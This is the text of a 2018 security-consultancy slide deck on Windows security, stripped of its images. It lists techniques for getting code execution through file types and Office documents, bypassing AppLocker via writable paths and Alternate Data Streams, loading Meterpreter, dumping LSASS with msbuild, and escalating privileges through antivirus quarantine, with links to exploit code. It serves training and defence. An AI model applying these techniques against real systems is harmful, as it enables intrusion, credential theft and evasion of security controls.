Basic Code Execution
• Abuse of unchecked file types – JS (or .JSE)
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
14
3
Basic Code Execution
• Another attack possibility are file shortcuts!
• Just create a shortcut to the required application (e.g.
PowerShell)
• Pass arguments inside shortcut
• With Microsoft explorer we are limited to MAX_PATH
• Use Microsoft API to create shortcut
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
14
4
Basic Code Execution
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
14
5
Basic Code Execution
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
14
6
Basic Code Execution
• Abuse of unchecked file types – .chm
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
14
7
Full Code Execution
• Malicious java applet
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
14
8
Bypassing AppLocker
• Attack vector: Microsoft Office
• Macro, embedded OLE object, DDE , EPS/RTF exploits, responder image / openDoc, …
• Basically the same as Java applets• We can start applications Launch PowerShell
• We can inject shellcode Full code Execution
• Useful tool - shellcode2vbscript• Written by Didier Stevens
• http://blog.didierstevens.com/2009/05/06/shellcode-2-vbscript/
• Modify script to work against 64-bit systems
• Long LongPtr
• Use PtrSafe in front of function definition
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
14
9
Bypassing AppLocker
• OLE attack:
Double click will start
the embedded script.
Source: The current Thread Landscape,
Modern Defenses & Effective Detection,
Sean Metcalf
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
15
0
Bypassing AppLocker
Source:
https://securingtomorrow.mcafee.co
m/mcafee-labs/dropping-files-temp-
folder-raises-security-concerns/
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
15
1
• CVE-2018-0802
• OLE is nowadays also used to drop the malware to disk
before a memory corruption exploit starts it automatically.
• Example: CVE-2018-0802
• https://github.com/rxwx/CVE-2018-
0802/blob/master/packager_exec_CVE-2018-0802.py
• Blog posts with details:
• https://research.checkpoint.com/another-office-equation-
rce-vulnerability/
• https://embedi.com/blog/skeleton-closet-ms-office-
vulnerability-you-didnt-know-about/
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
15
2
Bypassing AppLocker
Equation Editor was compiled in 2000, is a standalone application called by Word.
Memory Corruption protections from Word are not active for it (it basically has no memory corruption protections enabled…)
Vanilla stack based buffer overflow Used in real-world
Source: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about/
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
15
3
Bypassing AppLocker
• Another problem of AppLocker are the default rules:
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
15
4
Bypassing AppLocker
• Problem: This whitelists everything in C:\window\*
• Standard users can write to several locations there
• E.g.: C:\windows\Tasks\ is writeable!
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
15
5
Bypassing AppLocker
Question:
What if additional exception rules are configured which
remove the writeable locations from the whitelist?
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
15
6
Bypassing AppLocker
• Problem: ADS (Alternate Data Stream) can bypass it…
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
15
7
Bypassing AppLocker
• Alternate Data Streams can store data, executables and
libraries
• Internally they are used to store if a file was downloaded
from the internet
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
15
8
Bypassing AppLocker
• Dir /r can be used to display them:
• Or sysinternals streams.exe
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
15
9
Bypassing AppLocker
• But you can bypass it …
• Use … as name (or COM1 or append it to C:\)
• Also try to delete the file… ☺
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
16
0
Bypassing AppLocker
• You can also execute applications from ADS:
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
16
1
Bypassing AppLocker
• Or execute libraries…
• We can use it to bypass the AppLocker rule
• DLLs in C:\Windows\* must be executeable
• ADS appears to be in a different folder…
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
16
2
Bypassing AppLocker
• Meterpreter library:
• Start it via Microsoft „control.exe“ (which is whitelisted)
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
16
3
Some more NTFS tricks
• On windows non-admin users can‘t create file links,
however, they can create folder links (directory junktions)
• Please note: That‘s not the same as .lnk files
• Check AVGater: Let your AntiVirus detect your file in
folder x It‘s moved into quarantine. Remove x and
create the directory junction x pointing to system32. Click
restore in the AntiVirus quarantine AntiVirus will copy
the file to system32 with it’s own privileges (SYSTEM
privileges) privilege escalation
• https://bogner.sh/2017/11/avgater-getting-local-admin-by-
abusing-the-anti-virus-quarantine/
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
16
4
Bypassing AppLocker
• And there are also lots of pre-installed applications which will
take your code and run it inside it‘s own process…
• Bypasses Application Whitelisting because code is executed
in the whitelisted application
• Bypasses also reputation based endpoint protection systems
• Current list contains 44 different techniques….
• https://github.com/api0cradle/UltimateAppLockerByPassList
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
16
5
Bypassing AppLocker
• Dropping mimikatz.exe on a victim can trigger all type of alerts
(AV, IDS, IPS, Endpoint Protection system, …), so let the
Microsoft signed msbuild.exe dump the LSASS process for us…
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
16
6
Device Guard
• Microsoft Device Guard
• Similiar concept to AppLocker, but based on hardware
features and stronger
• Based on „virtualisation based security“ feature
• Windows 10 Enterprise
• Minimum UEFI version 2.3.1
• X64 architecture
• Also puts powershell in Constrained Language mode
• Aim: Run only signed code
Conclusion
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
16
8
Conclusion
• Windows 10 has a pretty good level of security
• Memory corruption exploitation became a lot harder over the last years (at least if all protections are enabled and you don’t have script execution)
• Windows security is not as bad as it’s reputation
• However, there are still many design flaws because of backward compatibility!
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
WE ARE HIRING
Source: http://www.globalresearch.ca/wp-content/uploads/2015/06/unclesam-we-want-you.jpg
• SEC Consult is hiring!
• Lots of interesting projects in an
international leading security company
• Experienced team with a passion to hack
systems ☺
• Contact: [email protected]
• Just talk to me directly after the talk!
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
Contact
170
Germany
SEC Consult Unternehmensberatung Deutschland GmbH
Ullsteinstraße 118 Turm B/8 Stock
12109 Berlin
Tel +49 30 30807283
Email [email protected]
LITAUEN
UAB Critical Security, a SEC Consult company
Sauletekio al. 15-311
10224 Vilnius
Tel +370 5 2195535
Email [email protected]
RUSSIA
CJCS Security Monitor
5th Donskoy proyezd, 15, Bldg. 6
119334, Moskau
Tel +7 495 662 1414
Email [email protected]
SINGAPORE
SEC Consult Singapore PTE. LTD
4 Battery Road
#25-01 Bank of China Building
Singapur (049908)
Email [email protected]
CANADA
i-SEC Consult Inc.
100 René-Lévesque West, Suite 2500
Montréal (Quebec) H3B 5C9
Email [email protected]
AUSTRIA
SEC Consult Unternehmensberatung GmbH
Komarigasse 14/1
2700 Wiener Neustadt
Tel +43 1 890 30 43 0
Email [email protected]
THAILAND
SEC Consult (Thailand) Co.,Ltd.
29/1 Piyaplace Langsuan Building 16th Floor, 16B
Soi Langsuan, Ploen Chit Road
Lumpini, Patumwan | Bangkok 10330
Email [email protected]
www.sec-consult.com
Switzerland
SEC Consult (Schweiz) AG
Turbinenstrasse 28
8005 Zürich
Tel +41 44 271 777 0 | Fax +43 1 890 30 43 15
Email [email protected]
AustriaSEC Consult Unternehmensberatung GmbH
Mooslackengasse 17
1190 Wien
Tel +43 1 890 30 43 0 | Fax +43 1 890 30 43 15
Email [email protected]